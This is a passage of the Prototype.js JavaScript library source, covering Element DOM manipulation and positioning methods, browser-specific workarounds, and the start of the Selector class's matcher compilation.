var range = element.ownerDocument.createRange();
range.selectNode(element);
content.evalScripts.bind(content).defer();
content = range.createContextualFragment(content.stripScripts());
}
element.parentNode.replaceChild(content, element);
return element;
},
insert: function(element, insertions) {
element = $(element);
if (Object.isString(insertions) || Object.isNumber(insertions) ||
Object.isElement(insertions) || (insertions && (insertions.toElement || insertions.toHTML)))
insertions = {bottom:insertions};
var content, t, range;
for (position in insertions) {
content = insertions[position];
position = position.toLowerCase();
t = Element._insertionTranslations[position];
if (content && content.toElement) content = content.toElement();
if (Object.isElement(content)) {
t.insert(element, content);
continue;
}
content = Object.toHTML(content);
range = element.ownerDocument.createRange();
t.initializeRange(element, range);
t.insert(element, range.createContextualFragment(content.stripScripts()));
content.evalScripts.bind(content).defer();
}
return element;
},
wrap: function(element, wrapper, attributes) {
element = $(element);
if (Object.isElement(wrapper))
$(wrapper).writeAttribute(attributes || { });
else if (Object.isString(wrapper)) wrapper = new Element(wrapper, attributes);
else wrapper = new Element('div', wrapper);
if (element.parentNode)
element.parentNode.replaceChild(wrapper, element);
wrapper.appendChild(element);
return wrapper;
},
inspect: function(element) {
element = $(element);
var result = '<' + element.tagName.toLowerCase();
$H({'id': 'id', 'className': 'class'}).each(function(pair) {
var property = pair.first(), attribute = pair.last();
var value = (element[property] || '').toString();
if (value) result += ' ' + attribute + '=' + value.inspect(true);
});
return result + '>';
},
recursivelyCollect: function(element, property) {
element = $(element);
var elements = [];
while (element = element[property])
if (element.nodeType == 1)
elements.push(Element.extend(element));
return elements;
},
ancestors: function(element) {
return $(element).recursivelyCollect('parentNode');
},
descendants: function(element) {
return $A($(element).getElementsByTagName('*')).each(Element.extend);
},
firstDescendant: function(element) {
element = $(element).firstChild;
while (element && element.nodeType != 1) element = element.nextSibling;
return $(element);
},
immediateDescendants: function(element) {
if (!(element = $(element).firstChild)) return [];
while (element && element.nodeType != 1) element = element.nextSibling;
if (element) return [element].concat($(element).nextSiblings());
return [];
},
previousSiblings: function(element) {
return $(element).recursivelyCollect('previousSibling');
},
nextSiblings: function(element) {
return $(element).recursivelyCollect('nextSibling');
},
siblings: function(element) {
element = $(element);
return element.previousSiblings().reverse().concat(element.nextSiblings());
},
match: function(element, selector) {
if (Object.isString(selector))
selector = new Selector(selector);
return selector.match($(element));
},
up: function(element, expression, index) {
element = $(element);
if (arguments.length == 1) return $(element.parentNode);
var ancestors = element.ancestors();
return expression ? Selector.findElement(ancestors, expression, index) :
ancestors[index || 0];
},
down: function(element, expression, index) {
element = $(element);
if (arguments.length == 1) return element.firstDescendant();
var descendants = element.descendants();
return expression ? Selector.findElement(descendants, expression, index) :
descendants[index || 0];
},
previous: function(element, expression, index) {
element = $(element);
if (arguments.length == 1) return $(Selector.handlers.previousElementSibling(element));
var previousSiblings = element.previousSiblings();
return expression ? Selector.findElement(previousSiblings, expression, index) :
previousSiblings[index || 0];
},
next: function(element, expression, index) {
element = $(element);
if (arguments.length == 1) return $(Selector.handlers.nextElementSibling(element));
var nextSiblings = element.nextSiblings();
return expression ? Selector.findElement(nextSiblings, expression, index) :
nextSiblings[index || 0];
},
select: function() {
var args = $A(arguments), element = $(args.shift());
return Selector.findChildElements(element, args);
},
adjacent: function() {
var args = $A(arguments), element = $(args.shift());
return Selector.findChildElements(element.parentNode, args).without(element);
},
identify: function(element) {
element = $(element);
var id = element.readAttribute('id'), self = arguments.callee;
if (id) return id;
do { id = 'anonymous_element_' + self.counter++ } while ($(id));
element.writeAttribute('id', id);
return id;
},
readAttribute: function(element, name) {
element = $(element);
if (Prototype.Browser.IE) {
var t = Element._attributeTranslations.read;
if (t.values[name]) return t.values[name](element, name);
if (t.names[name]) name = t.names[name];
if (name.include(':')) {
return (!element.attributes || !element.attributes[name]) ? null :
element.attributes[name].value;
}
}
return element.getAttribute(name);
},
writeAttribute: function(element, name, value) {
element = $(element);
var attributes = { }, t = Element._attributeTranslations.write;
if (typeof name == 'object') attributes = name;
else attributes[name] = value === undefined ? true : value;
for (var attr in attributes) {
var name = t.names[attr] || attr, value = attributes[attr];
if (t.values[attr]) name = t.values[attr](element, value);
if (value === false || value === null)
element.removeAttribute(name);
else if (value === true)
element.setAttribute(name, name);
else element.setAttribute(name, value);
}
return element;
},
getHeight: function(element) {
return $(element).getDimensions().height;
},
getWidth: function(element) {
return $(element).getDimensions().width;
},
classNames: function(element) {
return new Element.ClassNames(element);
},
hasClassName: function(element, className) {
if (!(element = $(element))) return;
var elementClassName = element.className;
return (elementClassName.length > 0 && (elementClassName == className ||
new RegExp("(^|\\s)" + className + "(\\s|$)").test(elementClassName)));
},
addClassName: function(element, className) {
if (!(element = $(element))) return;
if (!element.hasClassName(className))
element.className += (element.className ? ' ' : '') + className;
return element;
},
removeClassName: function(element, className) {
if (!(element = $(element))) return;
element.className = element.className.replace(
new RegExp("(^|\\s+)" + className + "(\\s+|$)"), ' ').strip();
return element;
},
toggleClassName: function(element, className) {
if (!(element = $(element))) return;
return element[element.hasClassName(className) ?
'removeClassName' : 'addClassName'](className);
},
// removes whitespace-only text node children
cleanWhitespace: function(element) {
element = $(element);
var node = element.firstChild;
while (node) {
var nextNode = node.nextSibling;
if (node.nodeType == 3 && !/\S/.test(node.nodeValue))
element.removeChild(node);
node = nextNode;
}
return element;
},
empty: function(element) {
return $(element).innerHTML.blank();
},
descendantOf: function(element, ancestor) {
element = $(element), ancestor = $(ancestor);
if (element.compareDocumentPosition)
return (element.compareDocumentPosition(ancestor) & 8) === 8;
if (element.sourceIndex && !Prototype.Browser.Opera) {
var e = element.sourceIndex, a = ancestor.sourceIndex,
nextAncestor = ancestor.nextSibling;
if (!nextAncestor) {
do { ancestor = ancestor.parentNode; }
while (!(nextAncestor = ancestor.nextSibling) && ancestor.parentNode);
}
if (nextAncestor) return (e > a && e < nextAncestor.sourceIndex);
}
while (element = element.parentNode)
if (element == ancestor) return true;
return false;
},
scrollTo: function(element) {
element = $(element);
var pos = element.cumulativeOffset();
window.scrollTo(pos[0], pos[1]);
return element;
},
getStyle: function(element, style) {
element = $(element);
style = style == 'float' ? 'cssFloat' : style.camelize();
var value = element.style[style];
if (!value) {
var css = document.defaultView.getComputedStyle(element, null);
value = css ? css[style] : null;
}
if (style == 'opacity') return value ? parseFloat(value) : 1.0;
return value == 'auto' ? null : value;
},
getOpacity: function(element) {
return $(element).getStyle('opacity');
},
setStyle: function(element, styles) {
element = $(element);
var elementStyle = element.style, match;
if (Object.isString(styles)) {
element.style.cssText += ';' + styles;
return styles.include('opacity') ?
element.setOpacity(styles.match(/opacity:\s*(\d?\.?\d*)/)[1]) : element;
}
for (var property in styles)
if (property == 'opacity') element.setOpacity(styles[property]);
else
elementStyle[(property == 'float' || property == 'cssFloat') ?
(elementStyle.styleFloat === undefined ? 'cssFloat' : 'styleFloat') :
property] = styles[property];
return element;
},
setOpacity: function(element, value) {
element = $(element);
element.style.opacity = (value == 1 || value === '') ? '' :
(value < 0.00001) ? 0 : value;
return element;
},
getDimensions: function(element) {
element = $(element);
var display = $(element).getStyle('display');
if (display != 'none' && display != null) // Safari bug
return {width: element.offsetWidth, height: element.offsetHeight};
// All *Width and *Height properties give 0 on elements with display none,
// so enable the element temporarily
var els = element.style;
var originalVisibility = els.visibility;
var originalPosition = els.position;
var originalDisplay = els.display;
els.visibility = 'hidden';
els.position = 'absolute';
els.display = 'block';
var originalWidth = element.clientWidth;
var originalHeight = element.clientHeight;
els.display = originalDisplay;
els.position = originalPosition;
els.visibility = originalVisibility;
return {width: originalWidth, height: originalHeight};
},
makePositioned: function(element) {
element = $(element);
var pos = Element.getStyle(element, 'position');
if (pos == 'static' || !pos) {
element._madePositioned = true;
element.style.position = 'relative';
// Opera returns the offset relative to the positioning context, when an
// element is position relative but top and left have not been defined
if (window.opera) {
element.style.top = 0;
element.style.left = 0;
}
}
return element;
},
undoPositioned: function(element) {
element = $(element);
if (element._madePositioned) {
element._madePositioned = undefined;
element.style.position =
element.style.top =
element.style.left =
element.style.bottom =
element.style.right = '';
}
return element;
},
makeClipping: function(element) {
element = $(element);
if (element._overflow) return element;
element._overflow = Element.getStyle(element, 'overflow') || 'auto';
if (element._overflow !== 'hidden')
element.style.overflow = 'hidden';
return element;
},
undoClipping: function(element) {
element = $(element);
if (!element._overflow) return element;
element.style.overflow = element._overflow == 'auto' ? '' : element._overflow;
element._overflow = null;
return element;
},
cumulativeOffset: function(element) {
var valueT = 0, valueL = 0;
do {
valueT += element.offsetTop || 0;
valueL += element.offsetLeft || 0;
element = element.offsetParent;
} while (element);
return Element._returnOffset(valueL, valueT);
},
positionedOffset: function(element) {
var valueT = 0, valueL = 0;
do {
valueT += element.offsetTop || 0;
valueL += element.offsetLeft || 0;
element = element.offsetParent;
if (element) {
if (element.tagName == 'BODY') break;
var p = Element.getStyle(element, 'position');
if (p == 'relative' || p == 'absolute') break;
}
} while (element);
return Element._returnOffset(valueL, valueT);
},
absolutize: function(element) {
element = $(element);
if (element.getStyle('position') == 'absolute') return;
// Position.prepare(); // To be done manually by Scripty when it needs it.
var offsets = element.positionedOffset();
var top = offsets[1];
var left = offsets[0];
var width = element.clientWidth;
var height = element.clientHeight;
element._originalLeft = left - parseFloat(element.style.left || 0);
element._originalTop = top - parseFloat(element.style.top || 0);
element._originalWidth = element.style.width;
element._originalHeight = element.style.height;
element.style.position = 'absolute';
element.style.top = top + 'px';
element.style.left = left + 'px';
element.style.width = width + 'px';
element.style.height = height + 'px';
return element;
},
relativize: function(element) {
element = $(element);
if (element.getStyle('position') == 'relative') return;
// Position.prepare(); // To be done manually by Scripty when it needs it.
element.style.position = 'relative';
var top = parseFloat(element.style.top || 0) - (element._originalTop || 0);
var left = parseFloat(element.style.left || 0) - (element._originalLeft || 0);
element.style.top = top + 'px';
element.style.left = left + 'px';
element.style.height = element._originalHeight;
element.style.width = element._originalWidth;
return element;
},
cumulativeScrollOffset: function(element) {
var valueT = 0, valueL = 0;
do {
valueT += element.scrollTop || 0;
valueL += element.scrollLeft || 0;
element = element.parentNode;
} while (element);
return Element._returnOffset(valueL, valueT);
},
getOffsetParent: function(element) {
if (element.offsetParent) return $(element.offsetParent);
if (element == document.body) return $(element);
while ((element = element.parentNode) && element != document.body)
if (Element.getStyle(element, 'position') != 'static')
return $(element);
return $(document.body);
},
viewportOffset: function(forElement) {
var valueT = 0, valueL = 0;
var element = forElement;
do {
valueT += element.offsetTop || 0;
valueL += element.offsetLeft || 0;
// Safari fix
if (element.offsetParent == document.body &&
Element.getStyle(element, 'position') == 'absolute') break;
} while (element = element.offsetParent);
element = forElement;
do {
if (!Prototype.Browser.Opera || element.tagName == 'BODY') {
valueT -= element.scrollTop || 0;
valueL -= element.scrollLeft || 0;
}
} while (element = element.parentNode);
return Element._returnOffset(valueL, valueT);
},
clonePosition: function(element, source) {
var options = Object.extend({
setLeft: true,
setTop: true,
setWidth: true,
setHeight: true,
offsetTop: 0,
offsetLeft: 0
}, arguments[2] || { });
// find page position of source
source = $(source);
var p = source.viewportOffset();
// find coordinate system to use
element = $(element);
var delta = [0, 0];
var parent = null;
// delta [0,0] will do fine with position: fixed elements,
// position:absolute needs offsetParent deltas
if (Element.getStyle(element, 'position') == 'absolute') {
parent = element.getOffsetParent();
delta = parent.viewportOffset();
}
// correct by body offsets (fixes Safari)
if (parent == document.body) {
delta[0] -= document.body.offsetLeft;
delta[1] -= document.body.offsetTop;
}
// set position
if (options.setLeft) element.style.left = (p[0] - delta[0] + options.offsetLeft) + 'px';
if (options.setTop) element.style.top = (p[1] - delta[1] + options.offsetTop) + 'px';
if (options.setWidth) element.style.width = source.offsetWidth + 'px';
if (options.setHeight) element.style.height = source.offsetHeight + 'px';
return element;
}
};
Element.Methods.identify.counter = 1;
Object.extend(Element.Methods, {
getElementsBySelector: Element.Methods.select,
childElements: Element.Methods.immediateDescendants
});
Element._attributeTranslations = {
write: {
names: {
className: 'class',
htmlFor: 'for'
},
values: { }
}
};
if (!document.createRange || Prototype.Browser.Opera) {
Element.Methods.insert = function(element, insertions) {
element = $(element);
if (Object.isString(insertions) || Object.isNumber(insertions) ||
Object.isElement(insertions) || (insertions && (insertions.toElement || insertions.toHTML)))
insertions = { bottom: insertions };
var t = Element._insertionTranslations, content, position, pos, tagName;
for (position in insertions) {
content = insertions[position];
position = position.toLowerCase();
pos = t[position];
if (content && content.toElement) content = content.toElement();
if (Object.isElement(content)) {
pos.insert(element, content);
continue;
}
content = Object.toHTML(content);
tagName = ((position == 'before' || position == 'after')
? element.parentNode : element).tagName.toUpperCase();
if (t.tags[tagName]) {
var fragments = Element._getContentFromAnonymousElement(tagName, content.stripScripts());
if (position == 'top' || position == 'after') fragments.reverse();
fragments.each(pos.insert.curry(element));
}
else element.insertAdjacentHTML(pos.adjacency, content.stripScripts());
content.evalScripts.bind(content).defer();
}
return element;
};
}
if (Prototype.Browser.Opera) {
Element.Methods._getStyle = Element.Methods.getStyle;
Element.Methods.getStyle = function(element, style) {
switch(style) {
case 'left':
case 'top':
case 'right':
case 'bottom':
if (Element._getStyle(element, 'position') == 'static') return null;
default: return Element._getStyle(element, style);
}
};
Element.Methods._readAttribute = Element.Methods.readAttribute;
Element.Methods.readAttribute = function(element, attribute) {
if (attribute == 'title') return element.title;
return Element._readAttribute(element, attribute);
};
}
else if (Prototype.Browser.IE) {
$w('positionedOffset getOffsetParent viewportOffset').each(function(method) {
Element.Methods[method] = Element.Methods[method].wrap(
function(proceed, element) {
element = $(element);
var position = element.getStyle('position');
if (position != 'static') return proceed(element);
element.setStyle({ position: 'relative' });
var value = proceed(element);
element.setStyle({ position: position });
return value;
}
);
});
Element.Methods.getStyle = function(element, style) {
element = $(element);
style = (style == 'float' || style == 'cssFloat') ? 'styleFloat' : style.camelize();
var value = element.style[style];
if (!value && element.currentStyle) value = element.currentStyle[style];
if (style == 'opacity') {
if (value = (element.getStyle('filter') || '').match(/alpha\(opacity=(.*)\)/))
if (value[1]) return parseFloat(value[1]) / 100;
return 1.0;
}
if (value == 'auto') {
if ((style == 'width' || style == 'height') && (element.getStyle('display') != 'none'))
return element['offset' + style.capitalize()] + 'px';
return null;
}
return value;
};
Element.Methods.setOpacity = function(element, value) {
function stripAlpha(filter){
return filter.replace(/alpha\([^\)]*\)/gi,'');
}
element = $(element);
var currentStyle = element.currentStyle;
if ((currentStyle && !currentStyle.hasLayout) ||
(!currentStyle && element.style.zoom == 'normal'))
element.style.zoom = 1;
var filter = element.getStyle('filter'), style = element.style;
if (value == 1 || value === '') {
(filter = stripAlpha(filter)) ?
style.filter = filter : style.removeAttribute('filter');
return element;
} else if (value < 0.00001) value = 0;
style.filter = stripAlpha(filter) +
'alpha(opacity=' + (value * 100) + ')';
return element;
};
Element._attributeTranslations = {
read: {
names: {
'class': 'className',
'for': 'htmlFor'
},
values: {
_getAttr: function(element, attribute) {
return element.getAttribute(attribute, 2);
},
_getAttrNode: function(element, attribute) {
var node = element.getAttributeNode(attribute);
return node ? node.value : "";
},
_getEv: function(element, attribute) {
var attribute = element.getAttribute(attribute);
return attribute ? attribute.toString().slice(23, -2) : null;
},
_flag: function(element, attribute) {
return $(element).hasAttribute(attribute) ? attribute : null;
},
style: function(element) {
return element.style.cssText.toLowerCase();
},
title: function(element) {
return element.title;
}
}
}
};
Element._attributeTranslations.write = {
names: Object.clone(Element._attributeTranslations.read.names),
values: {
checked: function(element, value) {
element.checked = !!value;
},
style: function(element, value) {
element.style.cssText = value ? value : '';
}
}
};
Element._attributeTranslations.has = {};
$w('colSpan rowSpan vAlign dateTime accessKey tabIndex ' +
'encType maxLength readOnly longDesc').each(function(attr) {
Element._attributeTranslations.write.names[attr.toLowerCase()] = attr;
Element._attributeTranslations.has[attr.toLowerCase()] = attr;
});
(function(v) {
Object.extend(v, {
href: v._getAttr,
src: v._getAttr,
type: v._getAttr,
action: v._getAttrNode,
disabled: v._flag,
checked: v._flag,
readonly: v._flag,
multiple: v._flag,
onload: v._getEv,
onunload: v._getEv,
onclick: v._getEv,
ondblclick: v._getEv,
onmousedown: v._getEv,
onmouseup: v._getEv,
onmouseover: v._getEv,
onmousemove: v._getEv,
onmouseout: v._getEv,
onfocus: v._getEv,
onblur: v._getEv,
onkeypress: v._getEv,
onkeydown: v._getEv,
onkeyup: v._getEv,
onsubmit: v._getEv,
onreset: v._getEv,
onselect: v._getEv,
onchange: v._getEv
});
})(Element._attributeTranslations.read.values);
}
else if (Prototype.Browser.Gecko && /rv:1\.8\.0/.test(navigator.userAgent)) {
Element.Methods.setOpacity = function(element, value) {
element = $(element);
element.style.opacity = (value == 1) ? 0.999999 :
(value === '') ? '' : (value < 0.00001) ? 0 : value;
return element;
};
}
else if (Prototype.Browser.WebKit) {
Element.Methods.setOpacity = function(element, value) {
element = $(element);
element.style.opacity = (value == 1 || value === '') ? '' :
(value < 0.00001) ? 0 : value;
if (value == 1)
if(element.tagName == 'IMG' && element.width) {
element.width++; element.width--;
} else try {
var n = document.createTextNode(' ');
element.appendChild(n);
element.removeChild(n);
} catch (e) { }
return element;
};
// Safari returns margins on body which is incorrect if the child is absolutely
// positioned. For performance reasons, redefine Position.cumulativeOffset for
// KHTML/WebKit only.
Element.Methods.cumulativeOffset = function(element) {
var valueT = 0, valueL = 0;
do {
valueT += element.offsetTop || 0;
valueL += element.offsetLeft || 0;
if (element.offsetParent == document.body)
if (Element.getStyle(element, 'position') == 'absolute') break;
element = element.offsetParent;
} while (element);
return Element._returnOffset(valueL, valueT);
};
}
if (Prototype.Browser.IE || Prototype.Browser.Opera) {
// IE and Opera are missing .innerHTML support for TABLE-related and SELECT elements
Element.Methods.update = function(element, content) {
element = $(element);
if (content && content.toElement) content = content.toElement();
if (Object.isElement(content)) return element.update().insert(content);
content = Object.toHTML(content);
var tagName = element.tagName.toUpperCase();
if (tagName in Element._insertionTranslations.tags) {
$A(element.childNodes).each(function(node) { element.removeChild(node) });
Element._getContentFromAnonymousElement(tagName, content.stripScripts())
.each(function(node) { element.appendChild(node) });
}
else element.innerHTML = content.stripScripts();
content.evalScripts.bind(content).defer();
return element;
};
}
if (document.createElement('div').outerHTML) {
Element.Methods.replace = function(element, content) {
element = $(element);
if (content && content.toElement) content = content.toElement();
if (Object.isElement(content)) {
element.parentNode.replaceChild(content, element);
return element;
}
content = Object.toHTML(content);
var parent = element.parentNode, tagName = parent.tagName.toUpperCase();
if (Element._insertionTranslations.tags[tagName]) {
var nextSibling = element.next();
var fragments = Element._getContentFromAnonymousElement(tagName, content.stripScripts());
parent.removeChild(element);
if (nextSibling)
fragments.each(function(node) { parent.insertBefore(node, nextSibling) });
else
fragments.each(function(node) { parent.appendChild(node) });
}
else element.outerHTML = content.stripScripts();
content.evalScripts.bind(content).defer();
return element;
};
}
Element._returnOffset = function(l, t) {
var result = [l, t];
result.left = l;
result.top = t;
return result;
};
Element._getContentFromAnonymousElement = function(tagName, html) {
var div = new Element('div'), t = Element._insertionTranslations.tags[tagName];
div.innerHTML = t[0] + html + t[1];
t[2].times(function() { div = div.firstChild });
return $A(div.childNodes);
};
Element._insertionTranslations = {
before: {
adjacency: 'beforeBegin',
insert: function(element, node) {
element.parentNode.insertBefore(node, element);
},
initializeRange: function(element, range) {
range.setStartBefore(element);
}
},
top: {
adjacency: 'afterBegin',
insert: function(element, node) {
element.insertBefore(node, element.firstChild);
},
initializeRange: function(element, range) {
range.selectNodeContents(element);
range.collapse(true);
}
},
bottom: {
adjacency: 'beforeEnd',
insert: function(element, node) {
element.appendChild(node);
}
},
after: {
adjacency: 'afterEnd',
insert: function(element, node) {
element.parentNode.insertBefore(node, element.nextSibling);
},
initializeRange: function(element, range) {
range.setStartAfter(element);
}
},
tags: {
TABLE: ['<table>', '</table>', 1],
TBODY: ['<table><tbody>', '</tbody></table>', 2],
TR: ['<table><tbody><tr>', '</tr></tbody></table>', 3],
TD: ['<table><tbody><tr><td>', '</td></tr></tbody></table>', 4],
SELECT: ['<select>', '</select>', 1]
}
};
(function() {
this.bottom.initializeRange = this.top.initializeRange;
Object.extend(this.tags, {
THEAD: this.tags.TBODY,
TFOOT: this.tags.TBODY,
TH: this.tags.TD
});
}).call(Element._insertionTranslations);
Element.Methods.Simulated = {
hasAttribute: function(element, attribute) {
attribute = Element._attributeTranslations.has[attribute] || attribute;
var node = $(element).getAttributeNode(attribute);
return node && node.specified;
}
};
Element.Methods.ByTag = { };
Object.extend(Element, Element.Methods);
if (!Prototype.BrowserFeatures.ElementExtensions &&
document.createElement('div').__proto__) {
window.HTMLElement = { };
window.HTMLElement.prototype = document.createElement('div').__proto__;
Prototype.BrowserFeatures.ElementExtensions = true;
}
Element.extend = (function() {
if (Prototype.BrowserFeatures.SpecificElementExtensions)
return Prototype.K;
var Methods = { }, ByTag = Element.Methods.ByTag;
var extend = Object.extend(function(element) {
if (!element || element._extendedByPrototype ||
element.nodeType != 1 || element == window) return element;
var methods = Object.clone(Methods),
tagName = element.tagName, property, value;
// extend methods for specific tags
if (ByTag[tagName]) Object.extend(methods, ByTag[tagName]);
for (property in methods) {
value = methods[property];
if (Object.isFunction(value) && !(property in element))
element[property] = value.methodize();
}
element._extendedByPrototype = Prototype.emptyFunction;
return element;
}, {
refresh: function() {
// extend methods for all tags (Safari doesn't need this)
if (!Prototype.BrowserFeatures.ElementExtensions) {
Object.extend(Methods, Element.Methods);
Object.extend(Methods, Element.Methods.Simulated);
}
}
});
extend.refresh();
return extend;
})();
Element.hasAttribute = function(element, attribute) {
if (element.hasAttribute) return element.hasAttribute(attribute);
return Element.Methods.Simulated.hasAttribute(element, attribute);
};
Element.addMethods = function(methods) {
var F = Prototype.BrowserFeatures, T = Element.Methods.ByTag;
if (!methods) {
Object.extend(Form, Form.Methods);
Object.extend(Form.Element, Form.Element.Methods);
Object.extend(Element.Methods.ByTag, {
"FORM": Object.clone(Form.Methods),
"INPUT": Object.clone(Form.Element.Methods),
"SELECT": Object.clone(Form.Element.Methods),
"TEXTAREA": Object.clone(Form.Element.Methods)
});
}
if (arguments.length == 2) {
var tagName = methods;
methods = arguments[1];
}
if (!tagName) Object.extend(Element.Methods, methods || { });
else {
if (Object.isArray(tagName)) tagName.each(extend);
else extend(tagName);
}
function extend(tagName) {
tagName = tagName.toUpperCase();
if (!Element.Methods.ByTag[tagName])
Element.Methods.ByTag[tagName] = { };
Object.extend(Element.Methods.ByTag[tagName], methods);
}
function copy(methods, destination, onlyIfAbsent) {
onlyIfAbsent = onlyIfAbsent || false;
for (var property in methods) {
var value = methods[property];
if (!Object.isFunction(value)) continue;
if (!onlyIfAbsent || !(property in destination))
destination[property] = value.methodize();
}
}
function findDOMClass(tagName) {
var klass;
var trans = {
"OPTGROUP": "OptGroup", "TEXTAREA": "TextArea", "P": "Paragraph",
"FIELDSET": "FieldSet", "UL": "UList", "OL": "OList", "DL": "DList",
"DIR": "Directory", "H1": "Heading", "H2": "Heading", "H3": "Heading",
"H4": "Heading", "H5": "Heading", "H6": "Heading", "Q": "Quote",
"INS": "Mod", "DEL": "Mod", "A": "Anchor", "IMG": "Image", "CAPTION":
"TableCaption", "COL": "TableCol", "COLGROUP": "TableCol", "THEAD":
"TableSection", "TFOOT": "TableSection", "TBODY": "TableSection", "TR":
"TableRow", "TH": "TableCell", "TD": "TableCell", "FRAMESET":
"FrameSet", "IFRAME": "IFrame"
};
if (trans[tagName]) klass = 'HTML' + trans[tagName] + 'Element';
if (window[klass]) return window[klass];
klass = 'HTML' + tagName + 'Element';
if (window[klass]) return window[klass];
klass = 'HTML' + tagName.capitalize() + 'Element';
if (window[klass]) return window[klass];
window[klass] = { };
window[klass].prototype = document.createElement(tagName).__proto__;
return window[klass];
}
if (F.ElementExtensions) {
copy(Element.Methods, HTMLElement.prototype);
copy(Element.Methods.Simulated, HTMLElement.prototype, true);
}
if (F.SpecificElementExtensions) {
for (var tag in Element.Methods.ByTag) {
var klass = findDOMClass(tag);
if (Object.isUndefined(klass)) continue;
copy(T[tag], klass.prototype);
}
}
Object.extend(Element, Element.Methods);
delete Element.ByTag;
if (Element.extend.refresh) Element.extend.refresh();
Element.cache = { };
};
document.viewport = {
getDimensions: function() {
var dimensions = { };
$w('width height').each(function(d) {
var D = d.capitalize();
dimensions[d] = self['inner' + D] ||
(document.documentElement['client' + D] || document.body['client' + D]);
});
return dimensions;
},
getWidth: function() {
return this.getDimensions().width;
},
getHeight: function() {
return this.getDimensions().height;
},
getScrollOffsets: function() {
return Element._returnOffset(
window.pageXOffset || document.documentElement.scrollLeft || document.body.scrollLeft,
window.pageYOffset || document.documentElement.scrollTop || document.body.scrollTop);
}
};
/* Portions of the Selector class are derived from Jack Slocum’s DomQuery,
* part of YUI-Ext version 0.40, distributed under the terms of an MIT-style
* license. Please see http://www.yui-ext.com/ for more information. */
var Selector = Class.create({
initialize: function(expression) {
this.expression = expression.strip();
this.compileMatcher();
},
compileMatcher: function() {
// Selectors with namespaced attributes can't use the XPath version
if (Prototype.BrowserFeatures.XPath && !(/(\[[\w-]*?:|:checked)/).test(this.expression))
return this.compileXPathMatcher();
var e = this.expression, ps = Selector.patterns, h = Selector.handlers,
c = Selector.criteria, le, p, m;
if (Selector._cache[e]) {
this.matcher = Selector._cache[e];
return;
}
this.matcher = ["this.matcher = function(root) {",
"var r = root, h = Selector.handlers, c = false, n;"];
while (e && le != e && (/\S/).test(e)) {
le = e;
for (var i in ps) {
p = ps[i];
if (m = e.match(p)) {
this.matcher.push(Object.isFunction(c[i]) ? c[i](m) :
new Template(c[i]).evaluate(m));
e = e.replace(m[0], '');
break;
}
}
}
this.matcher.push("return h.unique(n);\n}");
eval(this.matcher.join('\n'));
Selector._cache[this.expression] = this.matcher;
},
compileXPathMatcher: function() {
var e = this.expression, ps = Selector.patterns,
x = Selector.xpath, le, m;
if (Selector._cache[e]) {
this.xpath = Selector._cache[e]; return;
}
this.matcher = ['.//*'];
while (e && le != e && (/\S/).test(e)) {
le = e;
for (var i in ps) {
if (m = e.match(ps[i])) {
this.matcher.push(Object.isFunction(x[i]) ? x[i](m) :
new Template(x[i]).evaluate(m));
e = e.replace(m[0], '');
break;
}
}
}
this.xpath = this.matcher.join('');
Selector._cache[this.expression] = this.xpath;
},
findElements: function(root) {
root = root || document;
if (this.xpath) return document._getElementsByXPath(this.xpath, root);
return this.matcher(root);
},
match: function(element) {
this.tokens = [];
var e = this.expression, ps = Selector.patterns, as = Selector.assertions;
var le, p, m;
while (e && le !== e && (/\S/).test(e)) {
le = e;
for (var i in ps) {
p = ps[i];
if (m = e.match(p)) {
// use the Selector.assertions methods unless the selector
// is too complex.
if (as[i]) {
this.tokens.push([i, Object.clone(m)]);
e = e.replace(m[0], '');
} else {
// reluctantly do a document-wide search
// and look for a match in the array
return this.findElements(document).include(element);
}
}
}
}
var match = true, name, matches;
for (var i = 0, token; token = this.tokens[i]; i++) {
name = token[0], matches = token[1];
if (!Selector.assertions[name](element, matches)) {
match = false; break;
}
}
return match;
},
toString: function() {
return this.expression;
},
inspect: function() {
return "#<Selector:" + this.expression.inspect() + ">";
}
});
Object.extend(Selector, {
_cache: { },
xpath: {
descendant: "//*",
child: "/*",
adjacent: "/following-sibling::*[1]",
laterSibling: '/following-sibling::*',
tagName: function(m) {
if (m[1] == '*') return '';
return "[local-name()='" + m[1].toLowerCase() +
"' or local-name()='" + m[1].toUpperCase() + "']";
},
className: "[contains(concat(' ', @class, ' '), ' #{1} ')]",
id: "[@id='#{1}']",
attrPresence: "[@#{1}]",
attr: function(m) {
m[3] = m[5] || m[6];
return new Template(Selector.xpath.operators[m[2]]).evaluate(m);
},
pseudo: function(m) {
var h = Selector.xpath.pseudos[m[1]];
if (!h) return '';
if (Object.isFunction(h)) return h(m);
return new Template(Selector.xpath.pseudos[m[1]]).evaluate(m);
},
operators: {
'=': "[@#{1}='#{3}']",
'!=': "[@#{1}!='#{3}']",
'^=': "[starts-with(@#{1}, '#{3}')]",
'$=': "[substring(@#{1}, (string-length(@#{1}) - string-length('#{3}') + 1))='#{3}']",
'*=': "[contains(@#{1}, '#{3}')]",
'~=': "[contains(concat(' ', @#{1}, ' '), ' #{3} ')]",
'|=': "[contains(concat('-', @#{1}, '-'), '-#{3}-')]"
},
pseudos: {
'first-child': '[not(preceding-sibling::*)]',
'last-child': '[not(following-sibling::*)]',
'only-child': '[not(preceding-sibling::* or following-sibling::*)]',
'empty': "[count(*) = 0 and (count(text()) = 0 or translate(text(), ' \t\r\n', '') = '')]",
'checked': "[@checked]",
'disabled': "[@disabled]",
'enabled': "[not(@disabled)]",
'not': function(m) {
var e = m[6], p = Selector.patterns,
x = Selector.xpath, le, m, v;
var exclusion = [];
while (e && le != e && (/\S/).test(e)) {
le = e;
for (var i in p) {
if (m = e.match(p[i])) {
v = Object.isFunction(x[i]) ? x[i](m) : new Template(x[i]).evaluate(m);
exclusion.push("(" + v.substring(1, v.length - 1) + ")");
e = e.replace(m[0], '');
break;
}
}
}
return "[not(" + exclusion.join(" and ") + ")]";
},
'nth-child': function(m) {
return Selector.xpath.pseudos.nth("(count(./preceding-sibling::*) + 1) ", m);
},
'nth-last-child': function(m) {
return Selector.xpath.pseudos.nth("(count(./following-sibling::*) + 1) ", m);
},
'nth-of-type': function(m) {
return Selector.xpath.pseudos.nth("position() ", m);
},
'nth-last-of-type': function(m) {
return Selector.xpath.pseudos.nth("(last() + 1 - position()) ", m);
},
'first-of-type': function(m) {
m[6] = "1"; return Selector.xpath.pseudos['nth-of-type'](m);
},
'last-of-type': function(m) {
m[6] = "1"; return Selector.xpath.pseudos['nth-last-of-type'](m);
},
'only-of-type': function(m) {
var p = Selector.xpath.pseudos; return p['first-of-type'](m) + p['last-of-type'](m);
},
nth: function(fragment, m) {
var mm, formula = m[6], predicate;
if (formula == 'even') formula = '2n+0';
if (formula == 'odd') formula = '2n+1';
